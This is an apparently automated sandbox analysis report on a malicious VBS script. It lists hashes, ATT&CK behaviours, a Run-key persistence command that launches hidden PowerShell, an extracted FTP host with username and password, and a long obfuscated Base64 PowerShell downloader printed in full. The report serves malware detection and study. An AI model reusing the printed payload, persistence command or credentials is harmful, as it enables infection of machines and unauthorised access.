229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs
Size

690KB
MD5

cc8e7dd9844aae2c0c5363c9df098c26
SHA1

42f8b641a91e51ba6dd605ad3af4a2b4d493eb43
SHA256

229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1
SHA512

3615a25efb2f51bd91fc64fff35352d0d99e1f41bccb8c8e0c484813378327ab580790372dfde34a2ddca158337e5c6e1e051bc235c6b6d43d9a0f8b3cd4de6a
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE77777777777777777777777777777777777777C:YfRXe

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 51 IoCs

flow	pid	Process
8	556	powershell.exe
18	556	powershell.exe
21	556	powershell.exe
23	556	powershell.exe
25	556	powershell.exe
31	556	powershell.exe
33	556	powershell.exe
35	556	powershell.exe
36	556	powershell.exe
37	556	powershell.exe
38	556	powershell.exe
41	556	powershell.exe
45	556	powershell.exe
53	556	powershell.exe
54	556	powershell.exe
55	556	powershell.exe
56	556	powershell.exe
57	556	powershell.exe
58	556	powershell.exe
59	556	powershell.exe
60	556	powershell.exe
62	556	powershell.exe
64	556	powershell.exe
65	556	powershell.exe
66	556	powershell.exe
67	556	powershell.exe
68	556	powershell.exe
69	556	powershell.exe
70	556	powershell.exe
71	556	powershell.exe
72	556	powershell.exe
74	556	powershell.exe
77	556	powershell.exe
79	556	powershell.exe
80	556	powershell.exe
81	556	powershell.exe
82	556	powershell.exe
83	556	powershell.exe
84	556	powershell.exe
85	556	powershell.exe
86	556	powershell.exe
87	556	powershell.exe
88	556	powershell.exe
89	556	powershell.exe
90	556	powershell.exe
91	556	powershell.exe
92	556	powershell.exe
93	556	powershell.exe
94	556	powershell.exe
95	556	powershell.exe
96	556	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2044	powershell.exe
3000	powershell.exe
556	powershell.exe
2780	powershell.exe
4816	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ged = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\cynbx.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3000	powershell.exe
3000	powershell.exe
556	powershell.exe
556	powershell.exe
556	powershell.exe
2780	powershell.exe
4816	powershell.exe
4816	powershell.exe
2780	powershell.exe
2044	powershell.exe
2044	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1560 wrote to memory of 3000	1560	WScript.exe	82
PID 1560 wrote to memory of 3000	1560	WScript.exe	82
PID 3000 wrote to memory of 556	3000	powershell.exe	84
PID 3000 wrote to memory of 556	3000	powershell.exe	84
PID 556 wrote to memory of 2780	556	powershell.exe	87
PID 556 wrote to memory of 2780	556	powershell.exe	87
PID 556 wrote to memory of 4816	556	powershell.exe	88
PID 556 wrote to memory of 4816	556	powershell.exe	88
PID 556 wrote to memory of 3384	556	powershell.exe	89
PID 556 wrote to memory of 3384	556	powershell.exe	89
PID 556 wrote to memory of 2044	556	powershell.exe	92
PID 556 wrote to memory of 2044	556	powershell.exe	92
PID 556 wrote to memory of 4184	556	powershell.exe	93
PID 556 wrote to memory of 4184	556	powershell.exe	93
PID 556 wrote to memory of 4884	556	powershell.exe	94
PID 556 wrote to memory of 4884	556	powershell.exe	94
PID 556 wrote to memory of 756	556	powershell.exe	98
PID 556 wrote to memory of 756	556	powershell.exe	98
PID 556 wrote to memory of 4300	556	powershell.exe	99
PID 556 wrote to memory of 4300	556	powershell.exe	99
PID 556 wrote to memory of 1352	556	powershell.exe	100
PID 556 wrote to memory of 1352	556	powershell.exe	100
PID 556 wrote to memory of 3724	556	powershell.exe	101
PID 556 wrote to memory of 3724	556	powershell.exe	101
PID 556 wrote to memory of 1792	556	powershell.exe	102
PID 556 wrote to memory of 1792	556	powershell.exe	102
PID 556 wrote to memory of 1120	556	powershell.exe	103
PID 556 wrote to memory of 1120	556	powershell.exe	103
PID 556 wrote to memory of 3944	556	powershell.exe	105
PID 556 wrote to memory of 3944	556	powershell.exe	105
PID 556 wrote to memory of 4492	556	powershell.exe	106
PID 556 wrote to memory of 4492	556	powershell.exe	106
PID 556 wrote to memory of 1508	556	powershell.exe	108
PID 556 wrote to memory of 1508	556	powershell.exe	108
PID 556 wrote to memory of 3632	556	powershell.exe	109
PID 556 wrote to memory of 3632	556	powershell.exe	109
PID 556 wrote to memory of 3728	556	powershell.exe	110
PID 556 wrote to memory of 3728	556	powershell.exe	110
PID 556 wrote to memory of 3972	556	powershell.exe	111
PID 556 wrote to memory of 3972	556	powershell.exe	111
PID 556 wrote to memory of 4508	556	powershell.exe	112
PID 556 wrote to memory of 4508	556	powershell.exe	112
PID 556 wrote to memory of 1084	556	powershell.exe	113
PID 556 wrote to memory of 1084	556	powershell.exe	113
PID 556 wrote to memory of 2040	556	powershell.exe	114
PID 556 wrote to memory of 2040	556	powershell.exe	114
PID 556 wrote to memory of 2344	556	powershell.exe	115
PID 556 wrote to memory of 2344	556	powershell.exe	115
PID 556 wrote to memory of 3308	556	powershell.exe	116
PID 556 wrote to memory of 3308	556	powershell.exe	116
PID 556 wrote to memory of 748	556	powershell.exe	117
PID 556 wrote to memory of 748	556	powershell.exe	117
PID 556 wrote to memory of 3492	556	powershell.exe	118
PID 556 wrote to memory of 3492	556	powershell.exe	118
PID 556 wrote to memory of 4804	556	powershell.exe	119
PID 556 wrote to memory of 4804	556	powershell.exe	119
PID 556 wrote to memory of 4780	556	powershell.exe	120
PID 556 wrote to memory of 4780	556	powershell.exe	120
PID 556 wrote to memory of 4388	556	powershell.exe	121
PID 556 wrote to memory of 4388	556	powershell.exe	121
PID 556 wrote to memory of 1964	556	powershell.exe	122
PID 556 wrote to memory of 1964	556	powershell.exe	122
PID 556 wrote to memory of 4292	556	powershell.exe	123
PID 556 wrote to memory of 4292	556	powershell.exe	123

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしGYせㅚしaQByせㅚしGUせㅚしYgBhせㅚしHMせㅚしZQBzせㅚしHQせㅚしbwByせㅚしGEせㅚしZwBlせㅚしC4せㅚしZwBvせㅚしG8せㅚしZwBsせㅚしGUせㅚしYQBwせㅚしGkせㅚしcwせㅚしuせㅚしGMせㅚしbwBtせㅚしC8せㅚしdgせㅚしwせㅚしC8せㅚしYgせㅚしvせㅚしGgせㅚしbwBwせㅚしGUせㅚしLQせㅚし1せㅚしDYせㅚしOQせㅚし4せㅚしDせㅚしせㅚしLgBhせㅚしHせㅚしせㅚしcせㅚしBzせㅚしHせㅚしせㅚしbwB0せㅚしC4せㅚしYwBvせㅚしG0せㅚしLwBvせㅚしC8せㅚしUwBvせㅚしGMせㅚしYwBlせㅚしHIせㅚしLgB0せㅚしHgせㅚしdせㅚしせㅚし/せㅚしGEせㅚしbせㅚしB0せㅚしD0せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしCYせㅚしdせㅚしBvせㅚしGsせㅚしZQBuせㅚしD0せㅚしZQせㅚし1せㅚしDMせㅚしNQせㅚしyせㅚしDせㅚしせㅚしYQせㅚしwせㅚしC0せㅚしMgせㅚし0せㅚしDUせㅚしNgせㅚしtせㅚしDQせㅚしMせㅚしせㅚしxせㅚしGEせㅚしLQせㅚし5せㅚしGIせㅚしMgBkせㅚしC0せㅚしMwせㅚしwせㅚしDQせㅚしZgせㅚしzせㅚしDMせㅚしNせㅚしせㅚしxせㅚしDgせㅚしZgせㅚしzせㅚしDgせㅚしJwせㅚしgせㅚしCgせㅚしIせㅚしBdせㅚしF0せㅚしWwB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしbwBbせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGwせㅚしbせㅚしB1せㅚしG4せㅚしJせㅚしせㅚしgせㅚしCgせㅚしZQBrせㅚしG8せㅚしdgBuせㅚしEkせㅚしLgせㅚしpせㅚしCせㅚしせㅚしJwBJせㅚしFYせㅚしRgByせㅚしHせㅚしせㅚしJwせㅚしgせㅚしCgせㅚしZせㅚしBvせㅚしGgせㅚしdせㅚしBlせㅚしE0せㅚしdせㅚしBlせㅚしEcせㅚしLgせㅚしpせㅚしCcせㅚしMQBzせㅚしHMせㅚしYQBsせㅚしEMせㅚしLgせㅚしzせㅚしHkせㅚしcgBhせㅚしHIせㅚしYgBpせㅚしEwせㅚしcwBzせㅚしGEせㅚしbせㅚしBDせㅚしCcせㅚしKせㅚしBlせㅚしHせㅚしせㅚしeQBUせㅚしHQせㅚしZQBHせㅚしC4せㅚしKQせㅚしgせㅚしHgせㅚしbQB6せㅚしFgせㅚしeせㅚしせㅚしkせㅚしCせㅚしせㅚしKせㅚしBkせㅚしGEせㅚしbwBMせㅚしC4せㅚしbgBpせㅚしGEせㅚしbQBvせㅚしEQせㅚしdせㅚしBuせㅚしGUせㅚしcgByせㅚしHUせㅚしQwせㅚし6せㅚしDoせㅚしXQBuせㅚしGkせㅚしYQBtせㅚしG8せㅚしRせㅚしBwせㅚしHせㅚしせㅚしQQせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしOwせㅚしpせㅚしCせㅚしせㅚしKQせㅚしgせㅚしCcせㅚしQQせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしkyE6せㅚしJMhJwせㅚしgせㅚしCgせㅚしZQBjせㅚしGEせㅚしbせㅚしBwせㅚしGUせㅚしUgせㅚしuせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwせㅚし0せㅚしDYせㅚしZQBzせㅚしGEせㅚしQgBtせㅚしG8せㅚしcgBGせㅚしDoせㅚしOgBdせㅚしHQせㅚしcgBlせㅚしHYせㅚしbgBvせㅚしEMせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHgせㅚしbQB6せㅚしFgせㅚしeせㅚしせㅚしkせㅚしCせㅚしせㅚしXQBdせㅚしFsせㅚしZQB0せㅚしHkせㅚしQgBbせㅚしDsせㅚしJwせㅚしlせㅚしEkせㅚしaせㅚしBxせㅚしFIせㅚしWせㅚしせㅚしlせㅚしCcせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBqせㅚしHcせㅚしegBoせㅚしCQせㅚしOwせㅚしpせㅚしCせㅚしせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしCせㅚしせㅚしPQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしKせㅚしBlせㅚしHMせㅚしbwBwせㅚしHMせㅚしaQBkせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしCせㅚしせㅚしJwB0せㅚしHgせㅚしdせㅚしせㅚしuせㅚしDEせㅚしMせㅚしBMせㅚしEwせㅚしRせㅚしせㅚしvせㅚしDEせㅚしMせㅚしせㅚしvせㅚしHIせㅚしZQB0せㅚしHせㅚしせㅚしeQByせㅚしGMせㅚしcせㅚしBVせㅚしC8せㅚしcgBiせㅚしC4せㅚしbQBvせㅚしGMせㅚしLgB0せㅚしGEせㅚしcgBiせㅚしHYせㅚしawBjせㅚしHMせㅚしZQBkせㅚしC4せㅚしcせㅚしB0せㅚしGYせㅚしQせㅚしせㅚしxせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしLwせㅚしvせㅚしDoせㅚしcせㅚしB0せㅚしGYせㅚしJwせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしZせㅚしBhせㅚしG8せㅚしbせㅚしBuせㅚしHcせㅚしbwBEせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚしpせㅚしCcせㅚしQせㅚしBせㅚしせㅚしHせㅚしせㅚしSgせㅚし4せㅚしDcせㅚしNQせㅚしxせㅚしDIせㅚしbwByせㅚしHせㅚしせㅚしcgBlせㅚしHせㅚしせㅚしbwBsせㅚしGUせㅚしdgBlせㅚしGQせㅚしJwせㅚしsせㅚしCcせㅚしMQB0せㅚしGEせㅚしcgBiせㅚしHYせㅚしawBjせㅚしHMせㅚしZQBkせㅚしCcせㅚしKせㅚしBsせㅚしGEせㅚしaQB0せㅚしG4せㅚしZQBkせㅚしGUせㅚしcgBDせㅚしGsせㅚしcgBvせㅚしHcせㅚしdせㅚしBlせㅚしE4せㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしG8せㅚしLQB3せㅚしGUせㅚしbgせㅚしgせㅚしD0せㅚしIせㅚしBzせㅚしGwせㅚしYQBpせㅚしHQせㅚしbgBlせㅚしGQせㅚしZQByせㅚしEMせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしDIせㅚしMQBzせㅚしGwせㅚしVせㅚしせㅚし6せㅚしDoせㅚしXQBlせㅚしHせㅚしせㅚしeQBUせㅚしGwせㅚしbwBjせㅚしG8せㅚしdせㅚしBvせㅚしHIせㅚしUせㅚしB5せㅚしHQせㅚしaQByせㅚしHUせㅚしYwBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしbせㅚしBvせㅚしGMせㅚしbwB0せㅚしG8せㅚしcgBQせㅚしHkせㅚしdせㅚしBpせㅚしHIせㅚしdQBjせㅚしGUせㅚしUwせㅚし6せㅚしDoせㅚしXQByせㅚしGUせㅚしZwBhせㅚしG4せㅚしYQBNせㅚしHQせㅚしbgBpせㅚしG8せㅚしUせㅚしBlせㅚしGMせㅚしaQB2せㅚしHIせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしDsせㅚしfQBlせㅚしHUせㅚしcgB0せㅚしCQせㅚしewせㅚしgせㅚしD0せㅚしIせㅚしBrせㅚしGMせㅚしYQBiせㅚしGwせㅚしbせㅚしBhせㅚしEMせㅚしbgBvせㅚしGkせㅚしdせㅚしBhせㅚしGQせㅚしaQBsせㅚしGEせㅚしVgBlせㅚしHQせㅚしYQBjせㅚしGkせㅚしZgBpせㅚしHQせㅚしcgBlせㅚしEMせㅚしcgBlせㅚしHYせㅚしcgBlせㅚしFMせㅚしOgせㅚし6せㅚしF0せㅚしcgBlせㅚしGcせㅚしYQBuせㅚしGEせㅚしTQB0せㅚしG4せㅚしaQBvせㅚしFせㅚしせㅚしZQBjせㅚしGkせㅚしdgByせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwB7せㅚしCせㅚしせㅚしZQBzせㅚしGwせㅚしZQB9せㅚしCせㅚしせㅚしZgせㅚしvせㅚしCせㅚしせㅚしMせㅚしせㅚしgせㅚしHQせㅚしLwせㅚしgせㅚしHIせㅚしLwせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしbgB3せㅚしG8せㅚしZせㅚしB0せㅚしHUせㅚしaせㅚしBzせㅚしCせㅚしせㅚしOwせㅚしnせㅚしDせㅚしせㅚしOせㅚしせㅚしxせㅚしCせㅚしせㅚしcせㅚしBlせㅚしGUせㅚしbせㅚしBzせㅚしCcせㅚしIせㅚしBkせㅚしG4せㅚしYQBtせㅚしG0せㅚしbwBjせㅚしC0せㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGwせㅚしbせㅚしBlせㅚしGgせㅚしcwByせㅚしGUせㅚしdwBvせㅚしHせㅚしせㅚしOwせㅚしgせㅚしGUせㅚしYwByせㅚしG8せㅚしZgせㅚしtせㅚしCせㅚしせㅚしKQせㅚしgせㅚしCcせㅚしcせㅚしB1せㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBcせㅚしHMせㅚしbQBhせㅚしHIせㅚしZwBvせㅚしHIせㅚしUせㅚしBcせㅚしHUせㅚしbgBlせㅚしE0せㅚしIせㅚしB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしXせㅚしBzせㅚしHcせㅚしbwBkせㅚしG4せㅚしaQBXせㅚしFwせㅚしdせㅚしBmせㅚしG8せㅚしcwBvせㅚしHIせㅚしYwBpせㅚしE0せㅚしXせㅚしBnせㅚしG4せㅚしaQBtせㅚしGEせㅚしbwBSせㅚしFwせㅚしYQB0せㅚしGEせㅚしRせㅚしBwせㅚしHせㅚしせㅚしQQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしcせㅚしB1せㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBkせㅚしGwせㅚしbwBGせㅚしCQせㅚしIせㅚしせㅚしoせㅚしCせㅚしせㅚしbgBvせㅚしGkせㅚしdせㅚしBhせㅚしG4せㅚしaQB0せㅚしHMせㅚしZQBEせㅚしC0せㅚしIせㅚしせㅚしnせㅚしCUせㅚしSQBoせㅚしHEせㅚしUgBYせㅚしCUせㅚしJwせㅚしgせㅚしG0せㅚしZQB0せㅚしEkせㅚしLQB5せㅚしHせㅚしせㅚしbwBDせㅚしCせㅚしせㅚしOwせㅚしgせㅚしHQせㅚしcgBhせㅚしHQせㅚしcwBlせㅚしHIせㅚしbwBuせㅚしC8せㅚしIせㅚしB0せㅚしGUせㅚしaQB1せㅚしHEせㅚしLwせㅚしgせㅚしGUせㅚしbせㅚしBpせㅚしGYせㅚしJせㅚしせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしYQBzせㅚしHUせㅚしdwせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしbせㅚしBsせㅚしGUせㅚしaせㅚしBzせㅚしHIせㅚしZQB3せㅚしG8せㅚしcせㅚしせㅚしgせㅚしDsせㅚしKQせㅚしnせㅚしHUせㅚしcwBtせㅚしC4せㅚしbgBpせㅚしHcせㅚしcせㅚしBVせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBhせㅚしHQせㅚしcwBhせㅚしHせㅚしせㅚしJせㅚしせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGUせㅚしbせㅚしBpせㅚしGYせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしBlせㅚしG0せㅚしYQBOせㅚしHIせㅚしZQBzせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしdせㅚしBuせㅚしGUせㅚしbQBuせㅚしG8せㅚしcgBpせㅚしHYせㅚしbgBFせㅚしFsせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしJwBcせㅚしHMせㅚしcgBlせㅚしHMせㅚしVQBcせㅚしDoせㅚしQwせㅚしnせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcせㅚしB1せㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBkせㅚしGwせㅚしbwBGせㅚしCQせㅚしOwせㅚしpせㅚしCcせㅚしdQBzせㅚしG0せㅚしLgBuせㅚしGkせㅚしdwBwせㅚしFUせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGEせㅚしdせㅚしBzせㅚしGEせㅚしcせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしBCせㅚしEsせㅚしTせㅚしBSせㅚしFUせㅚしJせㅚしせㅚしoせㅚしGUせㅚしbせㅚしBpせㅚしEYせㅚしZせㅚしBhせㅚしG8せㅚしbせㅚしBuせㅚしHcせㅚしbwBEせㅚしC4せㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHせㅚしせㅚしWQBTせㅚしHcせㅚしZgせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしWQBTせㅚしHcせㅚしZgせㅚしkせㅚしDsせㅚしfQせㅚし7せㅚしCせㅚしせㅚしKQせㅚしnせㅚしHIせㅚしZwせㅚし4せㅚしEQせㅚしNwBvせㅚしFIせㅚしcwBmせㅚしFYせㅚしYwByせㅚしDIせㅚしbgBBせㅚしGgせㅚしZgBoせㅚしFYせㅚしNgBEせㅚしEMせㅚしeせㅚしBSせㅚしHEせㅚしbgBxせㅚしGoせㅚしNQBqせㅚしHIせㅚしYgせㅚしxせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしcせㅚしBIせㅚしEEせㅚしUwBoせㅚしCQせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBwせㅚしEgせㅚしQQBTせㅚしGgせㅚしJせㅚしB7せㅚしCせㅚしせㅚしZQBzせㅚしGwせㅚしZQB9せㅚしDsせㅚしIせㅚしせㅚしpせㅚしCcせㅚしeせㅚしせㅚし0せㅚしGYせㅚしaせㅚしBaせㅚしE0せㅚしdwBOせㅚしDcせㅚしVQBlせㅚしF8せㅚしMせㅚしBfせㅚしDUせㅚしXwBpせㅚしGMせㅚしcwBiせㅚしGgせㅚしNwBDせㅚしFせㅚしせㅚしMせㅚしBJせㅚしGYせㅚしUせㅚしBkせㅚしEEせㅚしMgせㅚしxせㅚしDEせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしEgせㅚしQQBTAGgAJAAoACAAPQAgAHAASABBAFMAaAAkAHsAIAApAHYAZgBZAFQASAAkACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHYAZgBZAFQASAAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0せㅚしIABwAEgAQQBTAGgAJAA7ACkAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAYQB0AHMAYQBwACQAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABhAHQAcwBhAHAAJAB7ACAAKQBiAEoARwBwAFIAJAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAAYgBKAEcAcABSACQAIAA7AA==';$ziISm = $qCybe.replace('せㅚし' , 'A') ;$bQOzu = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $ziISm ) ); $bQOzu = $bQOzu[-1..-$bQOzu.Length] -join '';$bQOzu = 